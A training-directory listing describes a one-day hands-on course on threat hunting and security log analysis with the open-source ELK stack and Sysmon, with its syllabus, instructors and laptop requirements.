Search Courses


Confirm course information with the vendor.  Dates and locations can change. Courses can be cancelled.  

If you are a training vendor and want (1) add courses or (2) correct the information, send a message through the Contact Page.

If you login with your Facebook, Google, or Twitter account, you will see additional links to submit training courses or tools.

Threat Hunting with ELK Hands-On

On 06/04/17
Categories: USA, Florida
Tags: Conference
Hits: 698

Thursday, April 6, 2017 
9:00 AM – 5:00 PM
One-Day, 8 CPEs
Fred Mastrippolito, President & CEO, Polito, Inc.
Ben Hughes, Senior Security Engineer, Polito, Inc.

Successful log analysis is a cornerstone of any network or endpoint security program. Whether your organization is relying primarily on "next-gen" commercial security appliances or free security solutions, these tools will typically generate logs at scale that need to be collected, managed, tuned, enriched, monitored, analyzed, correlated, and reported. Even if your organization does not have a "next-gen" security monitoring solution at the network perimeter or on endpoints, or perhaps does not have a commercial SIEM solution, open source, or otherwise, free alternatives can be rapidly deployed to provide inexpensive yet effective security log monitoring and threat hunting capabilities.
This hands-on class will walk attendees through the basics of how to leverage the open source ELK stack to automatically and manually analyze diverse logs to proactively identify malicious activity. The basic tools, techniques, and procedures taught during this class can be used to investigate isolated endpoint security incidents or implemented at scale for monitoring an enterprise. Students will be provided with access to a preconfigured ELK instance in the cloud, as well as extensive sample logs containing malicious events waiting to be discovered.
This course is designed for entry to mid-level security analysts and managers. Students who complete this class will be better equipped with practical tools and techniques in order to understand, deploy, and leverage log monitoring and analysis tools in support of enterprise defense efforts.
This Class Will Cover:

o Introduction to log monitoring and analysis
o Security Information and Event Management (SIEM)
o Different types of event logs
o Log ingestion, indexing, and searching
o Log correlation and enrichment using additional data sources
o How network perimeter and endpoint security logs complement each other
• Introduction to threat hunting
o Where threat hunting fits into your security program
o Proactive monitoring/hunting vs. dead box forensics
o Understanding the malware kill chain
o The role of threat intelligence
o Identifying and hunting for Indicators of Compromise (IOCs)
o Relevant tools including mostly open source or otherwise free tools:
o ELK stack (popular open source log management platform)
o Elasticsearch (index and search)
o Logstash (log ingestion)
o Kibana (search and dashboard frontend)
o Sysmon (free Microsoft Sysinternals endpoint logging tool)
o Threat hunting with logs
o How to search logs to find anomalous/malicious events
o How to build and use dashboards, automation, and alerting capabilities
o How to integrate threat intelligence feeds and enrich data
o Next steps

Students must bring a Windows, Mac, or Linux laptop with at least 6 GB and a web browser. Previous experience with log analysis, threat hunting, malware analysis, forensics, network security monitoring, and/or threat intelligence is helpful but not required.